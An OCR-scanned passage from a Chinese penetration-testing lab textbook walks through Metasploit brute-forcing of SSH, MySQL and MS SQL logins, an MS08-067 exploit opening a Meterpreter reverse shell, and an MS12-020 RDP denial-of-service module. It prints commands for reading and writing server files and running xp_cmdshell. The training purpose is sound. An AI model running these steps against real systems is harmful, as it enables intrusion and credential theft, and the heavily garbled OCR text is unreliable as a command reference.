(6) 输入 “show options”, 显 示 ssh. login 模块 参数 ,如 图 9-158 所 示 。 


auxi liaryt ssh_login) > show options 
Module options (auxiliar 
Name Current Settin 


false 


/tmp/ pass. txt 
193. 168. 1. 26 
LsuccESS false 
1 
admin A to authen 
and passwords separated by space, one pair per line 
false ni ry the the passw r all users 
USER F 
VERBOSE true 


图 9-158 ssh_login 模块 参数 


重要 参数 解释 如 下 。 

RHOSTS: 目标 主机 IP 地 址 。 

PASS_FILE: 暴力 破解 密码 字典 存放 路 径 

USERNAME: 指定 暴力 破解 使 用 的 用 户 名 

"OP ON SUCCESS; 设置 破解 出 密码 后 立即 停止 暴力 破解 
(7) 设置 暴力 破解 目标 主机 的 相关 参数 ,如 图 9-159 所 示 


Imst auxiliary( ssh_login) > set pass_file /tmp/ pass. txt 
pass_file => /tmp/pass. txt 

msf auxiliary( ssh_Login) > rhosts 193.168 

rhosts => 193. 168. 1. 26 

msf auxiliary( Login) > stop on sucess 


top on sucess -» trure 

msf auxiliary(ssh login) > stop on sucess t 
stop on sucess => true 

Imsf auxiliary( ssh_login) > set username admin 
username => admin 


93159 设置 各 项 参数 


(8) 输入 “exploit? 开 始 暴力 破解 ,成功 获取 密码 ,为 "admin888”, 如 图 9-160 所 示 。 
(9) 打开 终端 ,输入 “ssh admin@ 193. 168. 1. 26”, 并 输入 破解 的 密码 ,登录 服务 器 ,如 
图 9-161 所 示 。 
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1lıary( ssh_login) > exploit 


193. 168. 1. 26:22 SSH - Starting brutefo 

193. 168. 1. 26:22 SSH - Failed: ' admin: 123456' 

No active DB Credential data will not be saved! 

193. 168. 1. 26:22 SSH - Success: ' admin: admin888' ' uid-500( admin) 


22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Li 
Credential data will not be saved! 
-- Credential data will not be saved! 
Command shell session 2 opened { 193. 168. 1. 100: 52716 -> 193. 168. 1 
Scanned 1 of 1 hosts (10096 complete) 
Auxiliary module execution completed 


图 9-160 ”执行 攻击 


1 


016 from 193. 168. 1. 100| 


图 9-161 成 功 登录 服务 器 
(10) 输入 命令 ,查看 服务 器 相关 信息 ,如 图 9-162 所 示 。 


[admn@dptech ~]$ whoami 
admin 

[ admin&dptech -]$ pwd 

|/ home/ admi n 


[admin@dptech -]$ ls 
1 2 公共 的 模板 视频 图 片 文档 下 载 音乐 桌面 
[ admingüptech -]$ 


图 9-162 执行 系统 命令 


实验 25 MySQL 暴力 破解 


、 实 验 目的 


掌握 通过 Metasploit 中 Mysql_login 模块 对 MYSQL 服务 进行 暴力 破解 最 终 获取 密码 
的 过 程 。 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Kali-Linux 1. 1.IP 地 址 为 193. 168. 1. 100。 
服务 器 操作 系统 : 装 有 mysql-essential-4122 的 Windows Server 2003. 地 址 为 
193.168. 1. 38, 
具 软 件 : Metasploit, Nmap, $K. 


三 、 实 验 步骤 


CD 使 用 Nmap 对 目标 地 址 193. 168. 1. 38 进行 端口 扫描 。 打 开 Kali, 打 开 Kali 系统 终 
端 ,输入 命令 “nmap -v -A -Pn 193. 168. 1. 38”, 对 该 IP 地 址 进行 扫描 ,结果 如 图 9-163 所 
示 。 发 现 开 放 了 MySQL 服务 ,在 3306 端口 上 , 且 版 本 低 于 5. 0。 

参数 说 明 如 下 。 

-v: 启用 详细 模式 。 


w 
e 


NSE: Script scanning 193. 168. 1. 38 
Initiating NSE at 15:14 

Completed NSE at 15:14, 4.52s elapsed 
Nmap scan report for 193. 168. 1. 38 
Host is up (0. 0021s latency) 

Not shown: 995 closed ports 


STATE SERVICE VERSION 
open msrpc Microsoft Windows RPC 
open netbios-ssn 


open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds 


open Microsoft Windows RPC 
22- communi ty- nt 


A 9-163 Nmap 扫描 结果 


A: 探测 目标 操作 系统 。 


不 去 ping 目标 主机 ,减少 被 发 现 或 被 防护 设备 屏蔽 的 概率 。 


(2) 打开 Kali %5 
问 被 阻止 。 多 次 尝试 
解 漏洞 存在 的 所 有 条 件 ,可 以 进行 暴力 破解 ,如 图 9-164 Bron. 


root@ptech- attack: ~# mysql -h 193. 168. 1.38 -u root -p 
Enter password: 


xi 


[ERROR 1045 (28000): Access denied for user 'root' @ 193. 168. 1. 100' 


Id: YES) 
root&Dptech- attack: ~# mysql -h 193.168. 1.38 -u root -p 
Enter password: 


ERROR 1045 (28000): Access denied for user ' root' @ 193. 168. 1. 100" 


Id: YES) 
rootGDptech- attack: ~# mysql -h 193.168.1.38 -u root -p 
Enter password. 


[ERROR 1045 (28000): Access denied for user ' root' 9 193. 168. 1. 100. 


ld: YES) 


图 9-164 ”尝试 登录 


(3) 使 用 Metasploit 中 的 mysql. login 模块 进行 暴力 破解 。 
“msfconsole”, 如 图 9-165 所 示 


root@ptech- attack: ~# mstconsole 
Starting the Metasploit Framework console. .. - 


I love shells --egypt 


统 终端 ,输入 “mysql-h 193. 168. 1. 38-u root-p” 
程 (三 次 或 以 上 ) ,发 现 仍然 可 以 尝试 输入 


打开 Kali 


Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with 


Metasploit Pro -- learn more on http: // rapid7. com metasploit 


E 1 1 e. 20 
ploits - 802 auxiliary - 9 post ] 
361 payloads - 37 encoders - 8 nops ] 
Free Metasploit Pro trial: http://r-7. co/ trymsp ] 


9-165 ”启动 Metasploit 


(4) 输入 “search mysql_login” ,搜索 mysql login 模块 ,如 图 


所 示 。 


(6) 输入 “show options”, 显 示 mysql login 模块 的 参数 ,如 图 9-168 所 示 。 


重要 参数 解释 如 下 。 


Z h 
RE 


9-166 所 示 。 
(5) 输入 “use auxiliary/scanner/mysql/mysql_login”, 加载 mysql_login 模块 ,如 图 9-167 


a 


jt A 


(using passwo 


(using passwor 


(using passwo 


统 终 


级 


,任意 输 ,提示 访 
密码 ,因此 


暴力 破 


端 ,输入 
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各 安全 与 


cted or 


cache not built 


图 9-167  Jmi& mysql login 模块 


msf auxiliary( mysql_login) > show options 


Module options (auxiliary/scanner/mysqU mysql. 


Name Current Setting Required 
BLANK, PASSWORDS 
BRUTEFORCE SPEED 
DB_ALL_CREDS 
DB_ALL_PASS 
DB ALL. USERS 
PASSWORD 
PASS FILE 
Proxies 
RHOSTS 
RPORT 
STOP. ON, SUCCESS 
THREADS 
USERNAME 
USERPASS FILE 

line 
USER. AS, PASS 
USER FILE 
VERBOSE 


login) 
Description 


Try E blank passwords for all users 

How fast to bruteforce, 

Try each user/ password 

Add all passwords in the current database to the list 
Add all users in the current database to the list 

A specific password to authen e with 
File containing passwords, one per line 
A proxy of format type: host: port[ 
The target address range or CIDR ident 
The target port 

Stop guessing when a credential works for a host 
The number of concurrent thread 

A specific username to authen 

File containing users and passwords separated by sp 


pe: host: port][ 
ier 


one pair pe 


Try the username as the password for all users 
File containing usernames, one per line 
whether to print output for all attempts 


图 9-168 mysql login 模块 的 参数 


RHOSTS: 目标 主机 IP 地 址 
PASS FILE; 暴力 破解 
USERNAME: 指定 暴力 破解 使 
STOP ON SUCCESS: 
(7) 设置 暴力 破解 对 方 数据 库 


Imsf auxiliary(mysql_login) > 


rhosts => 193. 168 


msf auxiliary( mysql_login) 


pass_file => /tmp/ 


msf auxiliary(mysql login) 


op_on_sucess => 


Imsf auxiliary(mysql_lo 


Username => root 


图 9-169 


(8) 输入 “exploit” 

(9) 打开 命令 行 ,输入 
登录 MySQL 

(10) fj "show databases" 


获取 数据 库 名 ,如 图 9-172 所 示 


,开始 暴 


“mysql -h 


设置 破解 出 


力 破 解 


服务 器 ,如 图 9-171 所 到 


密码 字典 存放 路 径 


用 的 用 户 名 
密码 后 立即 停止 暴力 破解 。 


的 相关 参数 ,如 图 9-169 所 示 


rhosts 193. 168. 1. 38 
1.3 

pass file /tmp/pass. txt 
pass. txt 

stop_on_sucess true 
true 


gin) username root 


设置 各 项 参数 


,成 功 获取 密码 ,为 admin888, 如 图 9-170 所 示 。 
193. 168. 1. 38 -u root -p”, 输 入 密码 “admin888”, 尝试 


分 号 ,分 号 为 SQL 语句 中 的 分 隔 符 )， 
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[*] 193. 168. 1. 
[1] No active 
-] 193. 168. 1. 
ling password: 
1] No active 
No active 
193. 168. 1 
Scanned 1 
Auxiliar 


38: 3306 MYSQL - Found remote MySQL version 4.1.22 
D8 -- Credential data will not be saved! 

38:3306 MYSQL - LOGIN FAILED: root: 123456 (Incorrd 
YES)) 

DB -- Credential data will not be saved! 

D8 -- Credential data will not be saved! 

38:3306 MYSQL - Success: ' root: admin888' 

of 1 hosts (10096 complete) 

module execution completed 


图 9-170 ”破解 结果 


Dptech- attack: ~# mySq 

Enter password: 

Welcome to the MySQL monitor. Commands end with ; or Vg. 
Your MySQL connection id is 15 

Server version: 4.1.22- community- nt 

Copyright (c) 20 2014, Oracle and/or its affiliates. All rights reserved. 
Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective 

owners. 


[Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. 


A 9-171 成功 登录 MySQL 


mysql> show databases; 
Mp 
Database | 


rows in set (0.03 sec) 


9-172 ”查询 数据 库 


(11) 输入 “select load. fileC'c: NW boot. ini 0"; , 读 取 c: NV boot. ini 启动 文件 的 内 容 , 如 


图 9-173 所 示 。 


0 
=multi( 0) disk( 0) rdisk(0) partition( 1)\ WINDOWS 
[operating systems] 
multi( 0) disk(0) rdisk( 0) partition(1)VWINDOWS-"Windows Server 2003, Enterprise" /n 
loexecute=optout /fastdetect 


图 9-173 i£ EX boot. ini 文件 


(12) fiij A "select 'aaaa' into dumpfile 'C:\\2. txt';”, 在 C 盘 新 建 一 个 2. txt 文件 并 写 
入 “aaaa”, 如 图 9-174 所 示 。 
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(13) 为 证 明确 实 创建 了 该 文件 ,可 再 次 利用 load. file 函数 读 取 2. txt 文件 ,输入 "select 
load_file('C:\\2. txt');”, 如 图 9-175 所 示 。 


ysql> select load_file(' C:\\2. txt' ); 


ysql> select 'aaaa' into dumpfile 'C:\\2. txt'; 
Query OK, 1 row affected (0.01 sec) row in set (0.00 sec) 


图 9-174 向 服务 器 写 入 2. txt 文件 图 9-175 ZH 2. txt 文件 


总 结 : 本 实验 介绍 了 MySQL 暴力 破解 漏洞 原理 ,通过 mysql_login 模块 对 该 漏洞 进行 
利用 ,最 终 成 功 获取 数据 库 密码 ,而 成 功 登录 MySQL 服务 器 后 攻击 者 可 进行 拖 库 、 向 操作 
系统 启动 目录 中 写 人 恶意 代码 脚本 等 操作 ,威胁 整个 服务 器 的 安全 。 


实验 26 MS SQL 暴力 破解 


一 、 实 验 目 的 
(OD 了 解 MS SQL 暴力 破解 漏洞 原理 ; 
(2) 掌握 Metasploit 基本 操作 方法 ; 
(3) 掌握 mssql_login 模块 操作 方法 。 


二 、 实 验 所 需 软 件 


客户 机 操作 系统 : Kali-Linux 1. 1,IP 地 址 为 193. 168. 1. 100, 
服务 器 操作 系统 : 装 有 MS SQL 的 Windows Server 2003 ,IP 地 址 为 193. 168. 1. 24, 
工具 软件 : Metasploit, NMAP, E f 


三 、 实 验 步骤 


(1) 使 用 Nmap 对 目标 地 址 193. 168. 1. 24 进行 端口 扫描 。 打 开 Kali, 打 开 Kali 系统 终 
端 ,输入 命令 “nmap -v -A -Pn 193. 168. 1. 24”, 对 该 IP 地 址 进行 扫描 ,结果 如 图 9-176 所 
示 。 发 现 开放 了 MS SQL 服务 ,在 1433 端口 上 。 


open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP) 
: No Allow or Public header in OPTIONS response (status code 400) 
Site doesn't have a title (text/html). 

open msrpc Microsoft Windows RPC 

open netbios-ssn 

open microsoft-ds Microsoft Windows 2003 or 2008 microsoft- ds 


open msrpc Microsoft Windows RPC 
open ms-sql-s Microsoft SQL Server 2008 10. 00. 1600. 00; RTM 
open ms-olap4? 


: general purpose 
Running: Microsoft Windows 2003 


图 9-176 Nmap 扫描 结果 


参数 说 明 如 下 。 
-v: 启用 详细 模式 。 
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A; 探测 目标 操作 系统 。 

Pn: 不 去 ping 目标 主机 ,减少 被 发 现 或 被 防护 设备 屏蔽 的 概率 。 

(2) 打开 Kali 系统 终端 ,输入 “osql-S 193. 168. 1. 24-U sa" ,任意 输入 密码 ,提示 访问 被 
阻止 。 多 次 尝试 这 个 过 程 ( 三 次 或 以 上 ) ,发 现 仍然 可 以 尝试 输入 密码 ,因此 满足 暴力 破解 漏 
洞 存在 的 所 有 条 件 ,可 以 进行 暴力 破解 ,如 图 9-177 所 示 。 

参数 说 明 如 下 。 

sql: osql 工具 是 32 位 Windows 系统 自 带 的 命令 ,可 以 运行 Transact-SQL 语句 和 脚本 
文件 。osql 工具 使 用 ODBC 数据 库 应 用 程序 编程 接口 (API) 与 服务 通信 。 

S. 目标 地 址 。 

U: 登录 使 用 的 用 户 名 。 

(3) 使 用 Metasploit 中 的 mysql_login 模块 进行 暴力 破解 。 打 开 Kali 系统 终端 ,输入 
“msfconsole”, 如 图 9-178 所 示 。 


root@ptech- attack: ~# mstconsole 
[*] Starting the Metasploit Framework console. . 


| METASPLOIT by Rapid7 


败 


1 -8 193.168.1.24 -U sa 


图 9-177 尝试 登录 图 9-178 启动 Metasploit 


(4) fij A" search mssql_login”, 搜 索 mssql_login 模块 ,如 图 9-179 所 示 。 


Imsf > search mssql_login 
[!] Database not connected or cache not built, using slow search 


Matching Modules 


Name ure Date Rank Des 
auxiliary/scanner/mssqU mssql. login normal MSS 
ity 


Æ 9-179 12 3: mssql. login 模块 
C5) 输入 “use auxiliary/scanner/mssql/mssql. login".Jlll à mssql login 模块 ,如 图 9-180 
所 示 。 


msf > use auxılıary/ scanner/ mssql/ mssql_login 
f auxiliary(mssql login) > B 


图 9-180 ”加 载 mssql login 模块 


(6) 输入 “show options", 显示 mysql login 模块 的 参数 ,如 图 9-181 所 示 。 
重要 参数 解释 如 下 。 
RHOSTS: 目标 主机 IP 地 址 。 
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[nsf auxiliary( mssql_login) > show options 


Module options (auxiliary/ scanner/ mssqU m 


Current 


the current database 


e password fo all users 


LAUTHENT false 
true 


Æ 9-181 mysql login 模块 的 参数 


PASS_FILE: 暴力 破解 密码 字典 存放 路 径 。 

USERNAME: 指定 暴力 破解 使 用 的 用 户 名 。 

STOP ON SUCCESS; 设置 破解 出 密码 后 立即 停止 暴力 破解 。 
(7) 设置 暴力 破解 对 方 数据 库 的 相关 参数 ,如 图 9-182 所 示 。 


Imsf auxiliary(mssql_login) > set rhosts 193.168.1.24 
rhosts 193. 168. 1. 24 

Imsf auxiUiary( mssqL_ Login) pass file /tmp/pass. txt 
pass file => /tmp/pass. txt 

Imsf auxiliary(mssql_login) stop on sucess true 
Ístop on sucess => true 

Inst auxiliary(mssql login) username sa 

username => sa 


图 9-182 设置 各 项 参数 


(8) 输入 “exploit” ,开始 暴力 破解 ,成功 获取 密码 ,为 123456 ,如 图 9-183 所 示 。 


msf auxiliary(mssql_login) > exploit 


[*] 193. 168. 1. 24: 1433 - MSSQL - Starting authentication scanner. 
[!] No active DB -- Credential data will not be saved! 

[!] No active DB -- Credential data will not be saved! 

[+] 193. 168. 1. 24: 1433 - LOGIN SUCCESSFUL: WORKSTATION sa: 123456 
[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed 


9-183 ”破解 结果 


(9) 打开 命令 行 , 输 入 “mysql -S 193. 168. 1. 24 -U sa”, 输 入 密码 “123456”, 尝 试 登录 
MS SQL 服务 器 ,成 功 连接 MS SQL 数据 库 , 如 图 9-184 所 示 

(10) fij A" select @@version”, 再 输入 "go”, 成 功 获取 
目标 数据 库 版 本 ,如 图 9-185 所 示 。 

(11) 输入 “exec master. dbo. xp_cmdshell 'net user'”， 


再 输入 "go” ,成 功 获取 目标 操作 系统 账户 信息 ,如 图 9-186 


图 9-184 成 功 登录 MS SQL 


所 示 。 
总 结 : 本 实验 介绍 了 MS SQL 暴力 破解 漏洞 原理 ,通过 mssql_login 模块 对 该 漏洞 进行 
利用 ,最 终 成 功 获取 了 数据 库 密 码 ， 从 而 威胁 整个 服务 器 的 安全 


» 
二 
» 
L3 
to 


H> select BBversion 


Microsoft SQL Server 2008 (RTM) - 19-B-1699-22 《Intel X86) 
Jul 9 2808 14:43: 
34 
Copyright <c> 1988-2088 Microsoft Corporation 
Enterprise Evaluatio 
n Edition on Windows NT 5.2 «X865 (Build 3798: Service Pack 2) <UM) 


图 9-185 获取 数据 库 版 本 


fidministrator SUPPORT_388945a@ 


9-186 ”获取 目标 操作 系统 账户 信息 


实验 27 Windows 系统 漏洞 MS08-067 


T fit MS08-067 漏洞 原理 , 掌 
二 、 实 验 所 需 软件 


客户 机 操作 系统 : Kali-Linux 1. 1.IP 地 址 为 193. 168. 1. 100。 
服务 器 操作 系统 : Windows Server 2000.IP 地 址 为 193. 168. 1. 1. 
工具 软件 : Nmap、Metasploit。 


、 实 验 步骤 


(1) 通过 Kali 环境 中 的 工具 Nmap 对 目标 主机 193. 168. 1. 1 开放 的 服务 端口 及 系统 
版 本 进行 扫描 ,输入 “nmap -sS -A --script ^ smb-check-vulns--script-args = unsafe— 1 -P0 
193. 168. 1. 1”, 结 果 如 图 9-187 所 示 。 


NMAP 使 用 方法 ,掌握 Metasploit 使 用 方法 。 


li 
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root@ptec :-£ nmap -sS -A --script-smb-check- vulns -- script-args-unsafe- 
1 -PO 193. 168.1.1 


[starting Nmap 6.47 ( http://nmap.org ) at 2016-01-30 17:12 CST 
Nmap scan report for 193.168.1.1 
Host 1s up (0. 0011s latency). 
Not shown: 982 closed ports 
STATE SERVICE VERSION 
open echo 
open discard? 
open daytime? 
open qotd Windows qotd (English) 
open chargen 
open wins Microsoft Windows Wins 
open domain Microsoft DNS 
open msrpc Microsoft Windows RPC 
open netbios-ssn 
open microsoft-ds Microsoft Windows 2000 microsoft-ds 
printer Microsoft lpd 
(name: DPTECH; protocol 2.1) 
Microsoft Windows RPC 
Microsoft Windows RPC 
Microsoft Windows RPC 
Microsoft Windows RPC 


MS08- 067: VULNERABLE 

Conficker: Likely CLEAN 

SMBv2 DoS ( CVE- 2009-3103): NOT VULNERABLE 

MS06-025: NO SERVICE (the Ras RPC service is inactive) 
MS07-029: NO SERVICE (the Dns Server RPC service is inactive) 


ADDRESS 
1.09 ms 193.168.1.1 


Æ 9-187 Nmap 扫描 主机 结果 


参数 说 明 如 下 。 
sS. 是 指 隐秘 的 TCP SYN 扫描 (-sT 是 隐秘 的 TCP 连接 扫描 )。 
A: 是 高 级 系统 探测 功能 ,提示 对 一 个 特定 服务 进行 更 深 的 旗 标 和 指纹 搜 取 ,能 提供 
多 的 信息 。 
script 一 smb-check-vulns: 指定 扫描 脚本 ,可 以 用 这 个 脚本 检查 目标 主机 是 否 有 相关 


漏洞 。 
script-args— unsafe— 1; 确认 smb 漏洞 具体 情况 。 
P0; 不 进行 主机 发 现 ,而 直接 进行 更 深层 次 的 扫描 ,0 为 数 : > 
扫描 结果 可 看 出 目标 主机 是 Windows Server 2000 服务 器 ,存在 MS08-067 漏洞 ,可 以 
被 溢出 攻击 。 
(2) fg Kali 环境 中 打开 MS08-067 利用 工具 Metasploit, 使 用 msfconsole 启动 
Metasploit ,如 图 9-188 所 示 。 


rootéDptech- attack: 
[*] Starting the Metasploit Framework console.../ 
Call trans opt: received. 2-19-98 13:24:18 REC:Loc 


Trace program running 


wake up, Neo.. 
the matrix has you 
follow the white rabbit 


knock, knock, Neo. 


图 9-188 JAZ) Metasploit 


267 


(3) Æ Metasploit 中 ,输入 “search ms08_067” 搜 索 漏洞 相关 模块 ,如 图 9-189 所 示 。 


msf > search ms08_067 
[!] Database not connected or cache not built, using slow search 


Matching Modules 


Name Disclosure Date Rank Description 


great MS08-067 Microso| 


ft Server Service Relative Path Stack Corruption 
图 9-189 搜索 MS08-067 相关 模块 
(4) 输入 “use exploit/windows/smb/ms08 067 netapi" ,加 载 该 模块 ,如 图 9-190 所 示 。 


se exploit/windows/ smb/ ms08 
xploit( ms08_ i 


9-190 ”加 载 ms08 067 netapi 模块 


C5) 加 载 模块 后 ,使 用 show options 命令 列 出 该 模块 进行 测试 需要 配置 的 相关 参数 ,如 


图 9-191 所 示 。 

explolt( ms08 api) > show options 

Module options (exploit/windows/smb/ms08 067 netapi): 
t Setting Re 
ST get address 

RPORT — 445 Set the SMB service port 

SMBPIPE BROWSER The pipe name to use (BROWSER SRVSVC) 
Exploit target: 


Id Name 


o Aut omatic Targeting 
9-191 Æ% ms08 067 netapi 模块 需要 配置 的 参数 


可 看 出 该 模块 需要 配置 RHOST, RPORT,SMBPIPE 和 Exploit target 4 个 参数 。 其 
中 ,RHOST 是 目标 主机 ,可 以 是 IP, 也 可 是 IP 网 段 。RPORT 为 目标 主机 端口 ,默认 是 
445, SMBPIPE 为 共享 通道 ,默认 是 139 端口 。Exploit target 表示 指定 攻击 目标 服务 器 操 
RR ,0 表示 自动 识别 操作 系统 ,但 成 功率 不 高 ,需要 手动 指定 操作 系统 类 型 。 根 据 
参数 要 求 , 只 需 设 置 目标 IP 地 址 和 指定 操作 系统 类 型 即 可 。 输 入 “set rhost 193. 168. 1.1” 
设置 目标 TP 地 址 ,如 图 9-192 所 示 。 


图 9-192 设置 攻击 目标 IP 地 址 


(6) 由 于 前 面 通过 Nmap 扫描 已 知 目标 系统 为 Windows Server 2000 服务 器 ,通过 
show targets 命令 查看 Metasploit 提供 的 目标 操作 系统 类 型 ,输入 命令 “show targets”, 如 
图 9-193 所 示 。 

通过 “show targets” 命 令 得 知 Windows 2000 操作 系统 类 型 ID 为 1, 输 入 “set target 1”, 进 
行 指定 ,如 图 9-194 所 示 。 


268 


程 (第 二 版 ) 


Imsf exploit(ms08_067_netapi) > show targets 


Exploit targets: 


Automatic Targeting 
Windows 2000 Universal 

Windows XP SPO/ SP1 Universal 

Windows 2003 SPO Universal 

Windows XP SP2 English (AlwaysOn NX) 

Windows XP SP2 English (NX) 

Windows XP SP3 English (AlwaysOn NX) 

Windows XP SP3 English (NX) 

Windows XP SP2 Arabic (NX) 

Windows XP SP2 Chinese - Traditional / Taiwan (NX) 
Windows XP SP2 Chinese - Simplified (NX) 

Windows XP SP2 Chinese - Traditional (NX) 

Windows XP SP2 Czech (NX) 

Windows XP SP2 Danish (NX) 

Windows XP SP2 German (NX) 

Windows XP SP2 Greek (NX) 

Windows XP SP2 Spanish (NX) 

Windows XP SP2 Finnish (NX) 


图 9-193 查看 targets 操作 系统 情况 


Imsf exploit(ms08 067 netapi) > set target 1 
target => 1 
Imsf exploit(ms08 06 tapi) > 


图 9-194 设置 目标 操作 系统 类 型 
来 查看 所 有 设置 


msf exploit(ms08_067_netapi) > show options 


(7) 再 次 输入 “show options" 否 正 确 , 如 图 9-195 所 示 。 


Module options (exploit/windows/ smb/ ms08_067_netapi) 


Name Current Setting Required Description 

RHOST 193. 168. 1.1 The target address 

RPORT 445 Set the SMB service port 

SMBPIPE BROWSER The pipe name to use (BROWSER, SRVSVC) 


Exploit target: 
Id Name 


1 Windows 2000 Universal 


图 9-195 查看 所 有 设置 
(8) 检测 所 有 参数 没有 错误 后 ,输入 “exploit” ,开始 进行 攻击 ,如 图 9-196 所 示 。 


exploit( ms08_067_netapi) > exploit 


Started reverse handler on 193. 168. 1. 100: 4444 

Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed o 
193. 168. 1. 1: 445). 

exploit ms08_067_netapi) > exploit 


Started reverse handler on 193. 168. 1. 100: 4444 

Attempting to trigger the vulnerability 

Sending stage (770048 bytes) to 193.168.1.1 

Meterpreter session 1 opened (193. 168. 1. 100: 4444 -> 193. 168. 1. 1: 1047) at 201 
6-01-30 18:24:34 +0800 


图 9-196 ”执行 MS08-067 结果 


(9) 溢出 成 功 。 输 入 ifconfig 和 pwd 验证 ,获取 目标 服务 器 信息 ,说 明 攻 击 成 功 ,如 
图 9-197 所 示 。 
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meterpreter > ifconfig 
nterface 1 


MS TCP Loopback interface 
00: 00: 00: 00: 00: 00 

: 1500 
127. 0.0.1 

: 255.0.0.0 


Interface 16777219 


AMD PCNET Family Ethernet Adapter 
00: Oc: 29: da: 7f: ae 
1500 
193. 168. 1.1 
5. 255. 255. 0 


meterpreter > pwd 
C: \WINNT\ system32 


E 9-197 在 本 地 查看 目标 服务 器 信息 


"m 


总 结 : 在 扫描 445 端口 后 ,由 于 系统 的 安全 性 ,会 暂时 性 地 关闭 该 端口 ,所 以 实验 过 程 
会 有 不 稳定 性 。MS08-067 漏洞 会 影响 Windows Server 2008 Core 之 外 的 所 有 Windows， 
为 了 保证 系统 安全 请 及 时 更 新 系统 补丁 ,同时 安装 安全 软件 提升 系统 安全 性 。 


实验 28 Windows 系统 漏洞 MS12-020 


一 、 实 验 目 的 

T fit MS12-020 漏洞 原理 ,掌握 Nmap 使 用 方法 ,掌握 Metasploit 使 用 方法 。 
二 、 实 验 所 需 软 件 

客户 机 操作 系统 : Kali-Linux 1.1,IP 地 址 为 193. 168. 1. 100. 

服务 器 操作 系统 : Windows Server 2003.IP 地 址 为 193. 168. 1. 2 。 

工具 软件 : Nmap, Metasploit. 
三 、 实 验 步 又 


(1) 通过 Kali 环境 中 的 工具 Nmap 对 目标 主机 193. 168. 1. 2 开放 的 服务 端口 及 系统 版 
本 进行 扫描 ,输入 “nmap -sS 193. 168. 1. 2 -p 3389”, 结 果 如 图 9-198 所 示 。 


ED 


[Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-30 18:36 CST 
Nmap scan report for 193.168.1.2 

Host is up (0. 0011s latency). 

PoRT STATE SERVICE 

B389/ tcp open ms-wbt- server 

MAC Address: 00: 0C: 29:72: 1E: 05 (VMware) 


: 1 IP address (1 host up) scanned in 13.21 seconds 


Æ 9-198 Nmap 扫描 主机 结果 


数 说 明 如 下 。 
-SS: 是 指 隐秘 的 TCP SYN 扫描 (-sT 是 隐秘 的 TCP 连接 扫描 ) 。 
-p: 用 于 扫描 指定 端口 。 


bi 
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从 扫描 结果 可 看 出 目标 主机 开放 了 3389 端口 ,可 能 存在 漏洞 ,可 利用 Metasploit 进行 


仿 测 和 利用 。 
(2) 在 Kali 环境 中 打开 MS12-020 利用 工具 Metasploit, 使 用 msfconsole 启动 


Metasploit, 如 图 9-199 所 示 。 


rootGDptech- attack: ~# msfconsole 
| 
giten 
GBBHHBHHHHHBHHIHHE 
DD 
RR 
dunt tn 
HFIBIIEHHEIIIEH EUH IH III IUÁY 
DD 
LE 


图 9-199 启动 Metasploit 
(3) Æ Metasploit 中 ,输入 “search ms12_020” 搜 索 漏洞 相关 模块 ,如 图 9-200 所 示 。 


Imsf > search ms12_020 
[!] Database not connected or cache not built, using slow search 


Disclosure Date Rank 


auxi liary/ dos/windows/ rdp/ ms12_020_maxchannelids 2012-03-16 normal 
12-020 Microsoft Remote Desktop - After- Free DoS 
auxi liary/ scanner/ rdp/ ms12_020_check 
12-020 Microsoft Remote Desktop Checker 


normal 


图 9-200 搜索 MS12-020 相关 模块 


得 到 两 个 结果 ,每 个 代表 不 同 的 作用 ,其 中 ,ms12_020_maxchannelids 是 进行 攻击 的 模 
块 ,ms12_020_check 是 进行 漏洞 扫描 的 模块 。 如 果 进 行 批量 攻击 ,可 以 进行 扫描 后 攻击 。 
(4) fili Hi" use auxiliary/scanner/rdp/ms12_020_check” 加 载 扫描 模块 ,如 图 9-201 所 示 。 


sf auxiliary(msi 


图 9-201 Hng ms12 020 check 扫描 模块 


C5) 加 载 模块 后 ,使 用 “show options” 命 令 列 出 该 模块 进行 测试 需要 配置 的 相关 参数 ， 
如 图 9-202 所 示 。 
Imsf. auxiliary( ms12_020_check) > show options 
Module options (auxiliary/ scanner/ rdp/ ms12_020_check): 


Current Setting Required Description 


The target address range or CIDR identifier 
Remote port running RDP 
The number of concurrent threads 


9-202 ”查看 ms12_020_check 模块 需要 配置 的 参数 
可 看 出 该 模块 需要 配置 RHOSTS、RPORT、THREADS 三 个 参数 。 其 中 ,RHOST 是 
目标 主机 ,可 以 是 IP, 也 可 是 IP 网 段 。RPORT 为 目标 主机 端口 ,默认 是 3389。THREADS 
为 扫描 过 程 中 的 进程 数量 ,默认 为 1。 输 入 “set rhosts 193. 168. 1. 2”, 设 置 目标 IP 地 址 ,如 
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图 9-203 所 示 。 


k) > set rhosts 19: 


图 9-203 设置 攻击 目标 IP 地 址 
“run”, 开 始 检 


uj. and 9-204 所 示 。 


Imsf. auxiliary( ms12_020_check) > exploit 
[*] 193.168.1.2:3389 - The target is vulnerable. 


[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


图 9-204 ”执行 ms12 020 check 模块 结果 


说 明 目 标 服务 器 193. 168. 1. 2 存在 此 漏洞 ,下 面 进行 攻击 。 
(7) fll A" auxiliary/DoS/windows/rdp/ms12. 020. maxchannelid 
图 9-205 所 示 。 


加 载 攻击 模块 ,如 


auxı liary(ms12_020_check) > use auxillary/ dos/windows/ rdp/ ms12_020_maxchannelids 


auxiLiary( ms12_020_maxchanneLids) | 


9-205 “加载 ms12_020_maxchannelids 攻击 模块 


(8) 使 用 “show options” 命 令 查看 使 用 该 模块 需要 配置 的 相关 参数 ,如 图 9-206 所 示 。 
auxı llary( ms12_020_maxchannel1ds) > show options 
Module options (auxiliary/dos/windows/ rdp/ms12 020 maxchannelids): 
Name Current Setting Required Description 


RHOST yes The target address 
RPORT 3389 yes The target port 


9-206 ms12 020 check 攻击 模块 需要 配置 的 参数 


机 IP 地 址 ,如 图 9-207 所 示 。 


auxiliary(msi2 02 > set rhost 193. 168. 1.2 


rhost => 193. 168. 1.2 


A 9-207 设置 攻击 的 IP 地 址 


(10) 设置 完 ms12 020 check 攻击 模块 的 参数 后 ,使 用 “exploit” 或 “run” 命 令 开 始 攻 
